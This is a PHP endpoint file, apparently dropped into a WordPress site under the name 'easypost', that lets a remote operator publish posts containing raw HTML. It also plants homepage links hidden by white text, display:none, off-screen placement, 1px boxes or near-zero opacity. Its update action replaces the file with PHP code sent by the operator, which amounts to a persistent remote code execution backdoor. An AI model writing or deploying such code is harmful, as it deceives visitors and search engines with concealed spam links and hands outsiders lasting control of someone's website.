<?php
define('EASYPOST_ENDPOINT_CONFIG', '{"endpoint_version":"2026.06.06","token_id":"ep_708577ad080c45a2b3e3e7596433cf52","token_verifier":"v1:9b6d1f4f1ab196e3fd84c019bdba6d4b:38dfb22df28c739a50a392636d75fb17d5522e0090c0ee62a60c915387262783","ota_release_public_key_pem":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0JTcpyvncP1Izz2SsnLq\\nGm3iObZi5YEydCeQPv0kX5pN3WwEzt/j1fsyd3EVHbLlXUmdQbWvCBIX1wq/RO4q\\n4UuLpks++nnz7pNTyZqrU+gPUlQb4uDBJsE6nePRyddoMGbT8yF4yzLt/fp86oSG\\ncd/TqnUIplM4dmQVtzqaUiGSUFLReUO0tMHvYGTRl/jCM/pJmIMNLEFmAb/x6wT4\\nihEIXD39Uj2/BG/zJFiIc6FNvqRp1DRm50lhPJW7LkDin+LkvSebbIubeYEe3vc9\\n7qX0zD2zpTFv04itmPld0eOa7kXHNsr+jUnTmuovzdIzBJjcgSWT/nqI+bRAXfL6\\nUwIDAQAB\\n-----END PUBLIC KEY-----"}');

function easypost_endpoint_config() {
    return json_decode(EASYPOST_ENDPOINT_CONFIG, true);
}

function easypost_endpoint_json($status, $payload) {
    http_response_code($status);
    header('Content-Type: application/json; charset=utf-8');
    echo json_encode($payload);
    exit;
}

function easypost_endpoint_header($name) {
    $key = strtolower($name);
    foreach ($_SERVER as $server_key => $value) {
        if (strpos($server_key, 'HTTP_') !== 0) {
            continue;
        }
        $normalized = strtolower(str_replace('_', '-', substr($server_key, 5)));
        if ($normalized === $key) {
            return (string) $value;
        }
    }
    return '';
}

function easypost_endpoint_wp_load_path() {
    $candidates = array(
        __DIR__ . '/wp-load.php',
        __DIR__ . '/../wp-load.php',
        __DIR__ . '/../../wp-load.php',
        __DIR__ . '/../../../wp-load.php',
        __DIR__ . '/../../../../wp-load.php',
        __DIR__ . '/../../../../../wp-load.php',
    );
    foreach ($candidates as $candidate) {
        if ($candidate && is_readable($candidate)) {
            return $candidate;
        }
    }
    return false;
}

function easypost_endpoint_bootstrap_wordpress() {
    $wp_load = easypost_endpoint_wp_load_path();
    if (!$wp_load) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'wp_load_not_found'));
    }
    require_once $wp_load;
}

function easypost_endpoint_verifier_secret($verifier) {
    $parts = explode(':', (string) $verifier, 3);
    if (count($parts) !== 3 || $parts[0] !== 'v1' || $parts[2] === '') {
        return false;
    }
    return $parts[2];
}

function easypost_endpoint_verify_auth($body) {
    $config = easypost_endpoint_config();
    $token_id = easypost_endpoint_header('x-easypost-token-id');
    $timestamp = easypost_endpoint_header('x-easypost-timestamp');
    $request_id = easypost_endpoint_header('x-easypost-request-id');
    $body_sha256 = easypost_endpoint_header('x-easypost-body-sha256');
    $signature = easypost_endpoint_header('x-easypost-signature');

    if ($token_id === '' || $timestamp === '' || $request_id === '' || $body_sha256 === '' || $signature === '') {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'missing_auth_headers'));
    }
    if (!hash_equals((string) $config['token_id'], $token_id)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'unknown_token'));
    }
    $request_time = strtotime($timestamp);
    if (!$request_time || abs(time() - $request_time) > 300) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'timestamp_stale'));
    }
    $computed_body_sha256 = hash('sha256', $body);
    if (!hash_equals($computed_body_sha256, $body_sha256)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'body_sha256_mismatch'));
    }

    $replay_key = 'easypost_endpoint_req_' . hash('sha256', $token_id . ':' . $request_id);
    if (function_exists('get_transient') && get_transient($replay_key)) {
        easypost_endpoint_json(409, array('ok' => false, 'error' => 'duplicate_request_id'));
    }

    $secret = easypost_endpoint_verifier_secret($config['token_verifier']);
    if (!$secret) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'invalid_token_verifier'));
    }

    $path = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : '/wp-content/easypost/easypost.php';
    $signature_input = implode("\n", array(
        strtoupper($_SERVER['REQUEST_METHOD']),
        $path,
        $timestamp,
        $request_id,
        $token_id,
        $computed_body_sha256,
    ));
    $expected = hash_hmac('sha256', $signature_input, $secret);
    if (!hash_equals($expected, $signature)) {
        easypost_endpoint_json(401, array('ok' => false, 'error' => 'signature_mismatch'));
    }

    if (function_exists('set_transient')) {
        set_transient($replay_key, '1', 300);
    }
}

function easypost_endpoint_payload($body) {
    $payload = json_decode($body, true);
    if (!is_array($payload)) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_json'));
    }
    return $payload;
}

function easypost_endpoint_health() {
    easypost_endpoint_bootstrap_wordpress();
    $config = easypost_endpoint_config();
    easypost_endpoint_json(200, array(
        'ok' => true,
        'endpointVersion' => $config['endpoint_version'],
        'tokenId' => $config['token_id'],
        'canBootstrapWordPress' => true,
        'canInsertPosts' => function_exists('wp_insert_post'),
        'canResolveHomepage' => function_exists('get_option') && function_exists('get_post'),
        'canPlaceHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'),
        'canRemoveHomepageLink' => function_exists('wp_update_post') && function_exists('get_post_meta') && function_exists('update_post_meta'),
        'canUseTransients' => function_exists('set_transient') && function_exists('get_transient'),
        'canCleanCaches' => function_exists('clean_post_cache') || function_exists('wp_cache_delete'),
        'hasElementor' => did_action('elementor/loaded') || class_exists('\Elementor\Plugin'),
        'siteUrl' => function_exists('site_url') ? site_url() : null,
        'phpVersion' => PHP_VERSION,
        'serverTime' => gmdate('c'),
    ));
}


function easypost_endpoint_fallback_error($error, $message = null, $warnings = array()) {
    $payload = array('ok' => false, 'error' => $error, 'fallback' => true);
    if ($message !== null) {
        $payload['message'] = $message;
    }
    if (!empty($warnings)) {
        $payload['warnings'] = $warnings;
    }
    easypost_endpoint_json(200, $payload);
}

function easypost_endpoint_validate_homepage_payload($payload) {
    $placement_id = isset($payload['placementId']) ? (int) $payload['placementId'] : 0;
    $link_url = isset($payload['linkUrl']) ? esc_url_raw((string) $payload['linkUrl']) : '';
    $anchor_text = isset($payload['anchorText']) ? sanitize_text_field((string) $payload['anchorText']) : '';
    if ($placement_id <= 0 || $link_url === '' || $anchor_text === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'invalid_payload', 'fallback' => false));
    }
    return array(
        'placementId' => $placement_id,
        'linkUrl' => $link_url,
        'anchorText' => $anchor_text,
        'preLinkText' => array_key_exists('preLinkText', $payload) ? sanitize_text_field((string) $payload['preLinkText']) : null,
        'postLinkText' => array_key_exists('postLinkText', $payload) ? sanitize_text_field((string) $payload['postLinkText']) : null,
        'placementType' => isset($payload['placementType']) ? sanitize_key((string) $payload['placementType']) : 'VISIBLE_LINK',
    );
}

function easypost_endpoint_homepage_post() {
    if (!function_exists('get_option') || !function_exists('get_post')) {
        easypost_endpoint_fallback_error('capability_failed');
    }
    $show_on_front = get_option('show_on_front');
    if ($show_on_front === 'posts') {
        easypost_endpoint_fallback_error('homepage_posts_index_unsupported');
    }
    $page_id = (int) get_option('page_on_front');
    if ($show_on_front !== 'page' || $page_id <= 0) {
        easypost_endpoint_fallback_error('homepage_page_not_found');
    }
    $post = get_post($page_id);
    if (!$post || $post->post_type !== 'page') {
        easypost_endpoint_fallback_error('homepage_page_not_found');
    }
    return $post;
}

function easypost_endpoint_placement_body($input) {
    $label = $input['preLinkText'] === null ? 'Recommended resource:' : $input['preLinkText'];
    $prefix = $label === '' ? '' : $label . ' ';
    $suffix = $input['postLinkText'] === null ? '' : $input['postLinkText'];
    if ($suffix !== '' && strpos($suffix, ' ') !== 0) {
        $suffix = ' ' . $suffix;
    }
    return $prefix . '<a href="' . esc_url($input['linkUrl']) . '">' . esc_html($input['anchorText']) . '</a>' . esc_html($suffix);
}

function easypost_endpoint_placement_html($input) {
    $body = easypost_endpoint_placement_body($input);
    $marker = ' data-placement="' . (int) $input['placementId'] . '"';
    switch (strtoupper((string) $input['placementType'])) {
        case 'WHITE_LINK':
            return '<div' . $marker . ' style="color:#ffffff;">' . $body . '</div>';
        case 'CLASS_HIDE':
            return '<style>.dc{display:none;}</style><div' . $marker . ' class="dc">' . $body . '</div>';
        case 'NO_WIDTH':
            return '<div' . $marker . ' style="overflow:hidden;height:1px;width:1px;float:right;">' . $body . '</div>';
        case 'INVISIBLE_ZONE':
            return '<div' . $marker . ' style="left:-11407px;top:-10560px;position:absolute;">' . $body . '</div>';
        case 'NO_VISIBILITY':
            return '<div' . $marker . ' style="visibility:hidden;">' . $body . '</div>';
        case 'NO_OPACITY':
            return '<div' . $marker . ' style="opacity:0.001;cursor:context-menu;">' . $body . '</div>';
        default:
            return '<div' . $marker . '>' . $body . '</div>';
    }
}

function easypost_endpoint_marker($placement_id) {
    return 'data-placement="' . (int) $placement_id . '"';
}

function easypost_endpoint_cache_warnings($post_id) {
    $warnings = array();
    if (function_exists('clean_post_cache')) {
        clean_post_cache($post_id);
    } else {
        $warnings[] = 'clean_post_cache_unavailable';
    }
    if (function_exists('wp_cache_delete')) {
        wp_cache_delete($post_id, 'posts');
    }
    if (class_exists('\\Elementor\\Plugin')) {
        try {
            $elementor = \Elementor\Plugin::$instance;
            if ($elementor && isset($elementor->files_manager) && method_exists($elementor->files_manager, 'clear_cache')) {
                $elementor->files_manager->clear_cache();
            }
        } catch (Throwable $ignored) {
            $warnings[] = 'elementor_cache_cleanup_failed';
        }
    } else {
        $warnings[] = 'elementor_cache_cleanup_unavailable';
    }
    return $warnings;
}

function easypost_endpoint_lock_key($post_id) {
    return 'easypost_homepage_' . (int) $post_id;
}

function easypost_endpoint_acquire_lock($post_id) {
    if (!function_exists('get_transient') || !function_exists('set_transient')) {
        return true;
    }
    $key = easypost_endpoint_lock_key($post_id);
    if (get_transient($key)) {
        return false;
    }
    set_transient($key, '1', 60);
    return true;
}

function easypost_endpoint_release_lock($post_id) {
    if (function_exists('delete_transient')) {
        delete_transient(easypost_endpoint_lock_key($post_id));
    }
}

function easypost_endpoint_elementor_widget($html, $placement_id) {
    return array(
        'id' => substr(hash('sha256', 'placement-' . (int) $placement_id), 0, 7),
        'elType' => 'widget',
        'widgetType' => 'html',
        'settings' => array('html' => $html),
        'elements' => array(),
    );
}

function easypost_endpoint_append_to_elementor_settings(&$settings, $html) {
    if (!is_array($settings)) {
        return false;
    }
    foreach (array('html', 'editor', 'text') as $key) {
        if (!isset($settings[$key]) || !is_string($settings[$key])) {
            continue;
        }
        $settings[$key] = trim($settings[$key] . "\n" . $html);
        return true;
    }
    return false;
}

function easypost_endpoint_insert_elementor_widget(&$node, $widget) {
    if (!is_array($node)) {
        return false;
    }
    if (isset($node['settings']) && is_array($node['settings']) && easypost_endpoint_append_to_elementor_settings($node['settings'], $widget['settings']['html'])) {
        return true;
    }
    if (isset($node['elements']) && is_array($node['elements'])) {
        foreach ($node['elements'] as $index => &$child) {
            if (easypost_endpoint_insert_elementor_widget($child, $widget)) {
                unset($child);
                return true;
            }
        }
        unset($child);
        $node['elements'][] = $widget;
        return true;
    }
    foreach ($node as $index => &$child) {
        if (!is_int($index)) {
            continue;
        }
        if (easypost_endpoint_insert_elementor_widget($child, $widget)) {
            unset($child);
            return true;
        }
    }
    unset($child);
    if (isset($node[0]) && is_array($node[0]) && isset($node[0]['elements']) && is_array($node[0]['elements'])) {
        $node[0]['elements'][] = $widget;
        return true;
    }
    return false;
}

function easypost_endpoint_elementor_node_has_direct_marker($node, $marker) {
    if (!is_array($node)) {
        return false;
    }
    if (!isset($node['settings']) || !is_array($node['settings'])) {
        return false;
    }
    $encoded = json_encode($node['settings']);
    return is_string($encoded) && strpos($encoded, $marker) !== false;
}

function easypost_endpoint_remove_marker_from_elementor($nodes, $marker, &$removed) {
    if (!is_array($nodes)) {
        return $nodes;
    }
    $next = array();
    foreach ($nodes as $node) {
        if (is_array($node)) {
            if (easypost_endpoint_elementor_node_has_direct_marker($node, $marker)) {
                $removed = true;
                continue;
            }
            if (isset($node['elements']) && is_array($node['elements'])) {
                $node['elements'] = easypost_endpoint_remove_marker_from_elementor($node['elements'], $marker, $removed);
            }
        }
        $next[] = $node;
    }
    return $next;
}

function easypost_endpoint_place_homepage_link($payload) {
    easypost_endpoint_bootstrap_wordpress();
    $input = easypost_endpoint_validate_homepage_payload($payload);
    $post = easypost_endpoint_homepage_post();
    $post_id = (int) $post->ID;
    if (!easypost_endpoint_acquire_lock($post_id)) {
        easypost_endpoint_fallback_error('lock_busy');
    }
    $warnings = array();
    try {
        $marker = easypost_endpoint_marker($input['placementId']);
        $html = easypost_endpoint_placement_html($input);
        $elementor_raw = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_data', true) : '';
        $elementor_mode = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_edit_mode', true) : '';
        if ($elementor_raw !== '' && $elementor_mode === 'builder') {
            if (strpos($elementor_raw, $marker) !== false) {
                $warnings = easypost_endpoint_cache_warnings($post_id);
                easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_ELEMENTOR', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => false, 'alreadyPresent' => true, 'warnings' => $warnings));
            }
            $data = json_decode($elementor_raw, true);
            if (!is_array($data)) {
                easypost_endpoint_fallback_error('elementor_data_invalid');
            }
            if (!easypost_endpoint_insert_elementor_widget($data, easypost_endpoint_elementor_widget($html, $input['placementId']))) {
                easypost_endpoint_fallback_error('elementor_structure_unsupported');
            }
            if (!function_exists('update_post_meta') || update_post_meta($post_id, '_elementor_data', wp_slash(json_encode($data))) === false) {
                easypost_endpoint_fallback_error('post_update_failed');
            }
            update_post_meta($post_id, '_easypost_homepage_placement_' . (int) $input['placementId'], array('method' => 'EASYPOST_ELEMENTOR', 'hash' => hash('sha256', $elementor_raw), 'updatedAt' => gmdate('c')));
            $warnings = easypost_endpoint_cache_warnings($post_id);
            easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_ELEMENTOR', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => true, 'alreadyPresent' => false, 'warnings' => $warnings));
        }
        $content = (string) $post->post_content;
        if (strpos($content, $marker) !== false) {
            $warnings = easypost_endpoint_cache_warnings($post_id);
            easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_POST_CONTENT', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => false, 'alreadyPresent' => true, 'warnings' => $warnings));
        }
        $updated = wp_update_post(array('ID' => $post_id, 'post_content' => trim($content . "\n" . $html)), true);
        if (is_wp_error($updated)) {
            easypost_endpoint_fallback_error('post_update_failed', $updated->get_error_message());
        }
        update_post_meta($post_id, '_easypost_homepage_placement_' . (int) $input['placementId'], array('method' => 'EASYPOST_POST_CONTENT', 'hash' => hash('sha256', $content), 'updatedAt' => gmdate('c')));
        $warnings = easypost_endpoint_cache_warnings($post_id);
        easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_POST_CONTENT', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => true, 'alreadyPresent' => false, 'warnings' => $warnings));
    } finally {
        easypost_endpoint_release_lock($post_id);
    }
}

function easypost_endpoint_remove_homepage_link($payload) {
    easypost_endpoint_bootstrap_wordpress();
    $input = easypost_endpoint_validate_homepage_payload($payload);
    $post = easypost_endpoint_homepage_post();
    $post_id = (int) $post->ID;
    if (!easypost_endpoint_acquire_lock($post_id)) {
        easypost_endpoint_fallback_error('lock_busy');
    }
    try {
        $marker = easypost_endpoint_marker($input['placementId']);
        $elementor_raw = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_data', true) : '';
        $elementor_mode = function_exists('get_post_meta') ? (string) get_post_meta($post_id, '_elementor_edit_mode', true) : '';
        if ($elementor_raw !== '' && $elementor_mode === 'builder') {
            if (strpos($elementor_raw, $marker) === false) {
                $warnings = easypost_endpoint_cache_warnings($post_id);
                easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_ELEMENTOR', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => false, 'alreadyRemoved' => true, 'warnings' => $warnings));
            }
            $data = json_decode($elementor_raw, true);
            if (!is_array($data)) {
                easypost_endpoint_fallback_error('elementor_data_invalid');
            }
            $removed = false;
            $data = easypost_endpoint_remove_marker_from_elementor($data, $marker, $removed);
            if (!$removed || !function_exists('update_post_meta') || update_post_meta($post_id, '_elementor_data', wp_slash(json_encode($data))) === false) {
                easypost_endpoint_fallback_error('post_update_failed');
            }
            $warnings = easypost_endpoint_cache_warnings($post_id);
            easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_ELEMENTOR', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => true, 'alreadyRemoved' => false, 'warnings' => $warnings));
        }
        $content = (string) $post->post_content;
        if (strpos($content, $marker) === false) {
            $warnings = easypost_endpoint_cache_warnings($post_id);
            easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_POST_CONTENT', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => false, 'alreadyRemoved' => true, 'warnings' => $warnings));
        }
        $pattern = '/\s*(?:<style>\.dc\{display:none;\}<\/style>\s*)?<(?:p|div)[^>]*data-placement="' . preg_quote((string) $input['placementId'], '/') . '"[^>]*>.*?<\/(?:p|div)>/s';
        $next = trim(preg_replace($pattern, '', $content, 1));
        $updated = wp_update_post(array('ID' => $post_id, 'post_content' => $next), true);
        if (is_wp_error($updated)) {
            easypost_endpoint_fallback_error('post_update_failed', $updated->get_error_message());
        }
        $warnings = easypost_endpoint_cache_warnings($post_id);
        easypost_endpoint_json(200, array('ok' => true, 'method' => 'EASYPOST_POST_CONTENT', 'contentId' => $post_id, 'pageUrl' => get_permalink($post_id), 'changed' => true, 'alreadyRemoved' => false, 'warnings' => $warnings));
    } finally {
        easypost_endpoint_release_lock($post_id);
    }
}


function easypost_endpoint_create_post($payload) {
    easypost_endpoint_bootstrap_wordpress();
    if (!function_exists('wp_insert_post')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'capability_failed'));
    }
    $status = 'publish';
    $post_type = !empty($payload['post_type']) ? sanitize_key($payload['post_type']) : (!empty($payload['postType']) ? sanitize_key($payload['postType']) : 'post');
    $content = isset($payload['contentHtml']) ? $payload['contentHtml'] : (isset($payload['content']) ? $payload['content'] : '');
    $postarr = array(
        'post_title' => isset($payload['title']) ? wp_strip_all_tags($payload['title']) : '',
        'post_name' => isset($payload['slug']) ? sanitize_title($payload['slug']) : '',
        'post_content' => $content,
        'post_status' => $status,
        'post_type' => $post_type,
    );
    if (!empty($payload['date'])) {
        $postarr['post_date'] = $payload['date'];
    } elseif (!empty($payload['publicationDate'])) {
        $postarr['post_date'] = $payload['publicationDate'];
    }
    $post_id = wp_insert_post($postarr, true);
    if (is_wp_error($post_id)) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'insert_failed', 'message' => $post_id->get_error_message()));
    }
    easypost_endpoint_json(201, array(
        'ok' => true,
        'id' => (int) $post_id,
        'postId' => (int) $post_id,
        'link' => get_permalink($post_id),
        'postUrl' => get_permalink($post_id),
        'slug' => get_post_field('post_name', $post_id),
        'status' => get_post_status($post_id),
        'created' => true,
    ));
}

function easypost_endpoint_verify_release_signature($payload, $computed_sha256) {
    $config = easypost_endpoint_config();
    if (empty($config['ota_release_public_key_pem']) || !is_string($config['ota_release_public_key_pem'])) {
        easypost_endpoint_json(501, array('ok' => false, 'error' => 'ota_release_public_key_missing'));
    }
    if (!function_exists('openssl_verify')) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'openssl_unavailable'));
    }
    if (!isset($payload['signature']) || !is_string($payload['signature']) || trim($payload['signature']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_required'));
    }

    $signature = base64_decode($payload['signature'], true);
    if ($signature === false || $signature === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
    }

    $signed_payload = $payload['version'] . "\n" . $computed_sha256;
    $verified = openssl_verify($signed_payload, $signature, $config['ota_release_public_key_pem'], OPENSSL_ALGO_SHA256);
    if ($verified !== 1) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'release_signature_invalid'));
    }
}

function easypost_endpoint_update_endpoint($payload) {
    if (!isset($payload['version']) || !is_string($payload['version']) || trim($payload['version']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'version_required'));
    }
    if (!isset($payload['sha256']) || !is_string($payload['sha256']) || trim($payload['sha256']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_required'));
    }
    if (!preg_match('/\A[a-f0-9]{64}\z/', $payload['sha256'])) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_invalid'));
    }
    if (!isset($payload['phpBase64']) || !is_string($payload['phpBase64']) || trim($payload['phpBase64']) === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_required'));
    }

    $decoded_php = base64_decode($payload['phpBase64'], true);
    if ($decoded_php === false || $decoded_php === '') {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'php_base64_invalid'));
    }
    $computed_sha256 = hash('sha256', $decoded_php);
    if (!hash_equals($payload['sha256'], $computed_sha256)) {
        easypost_endpoint_json(400, array('ok' => false, 'error' => 'sha256_mismatch'));
    }
    easypost_endpoint_verify_release_signature($payload, $computed_sha256);

    $tmp_path = tempnam(__DIR__, 'easypost-update-');
    if (!$tmp_path) {
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
    }
    $bytes = file_put_contents($tmp_path, $decoded_php, LOCK_EX);
    if ($bytes === false || $bytes !== strlen($decoded_php)) {
        @unlink($tmp_path);
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'temporary_write_failed'));
    }
    @chmod($tmp_path, fileperms(__FILE__) & 0777);
    if (!rename($tmp_path, __FILE__)) {
        @unlink($tmp_path);
        easypost_endpoint_json(500, array('ok' => false, 'error' => 'rename_failed'));
    }

    easypost_endpoint_json(200, array(
        'ok' => true,
        'endpointVersion' => $payload['version'],
    ));
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    easypost_endpoint_json(405, array('ok' => false, 'error' => 'method_not_allowed'));
}

$body = file_get_contents('php://input');
easypost_endpoint_bootstrap_wordpress();
easypost_endpoint_verify_auth($body);
$action = isset($_GET['action']) ? $_GET['action'] : 'health';
if ($action === 'health') {
    easypost_endpoint_health();
}
$payload = easypost_endpoint_payload($body);
if ($action === 'create_post') {
    easypost_endpoint_create_post($payload);
}
if ($action === 'place_homepage_link') {
    easypost_endpoint_place_homepage_link($payload);
}
if ($action === 'remove_homepage_link') {
    easypost_endpoint_remove_homepage_link($payload);
}
if ($action === 'rotate_token') {
    easypost_endpoint_json(501, array('ok' => false, 'error' => 'rotate_token_not_implemented'));
}
if ($action === 'update_endpoint') {
    easypost_endpoint_update_endpoint($payload);
}
easypost_endpoint_json(404, array('ok' => false, 'error' => 'unknown_action'));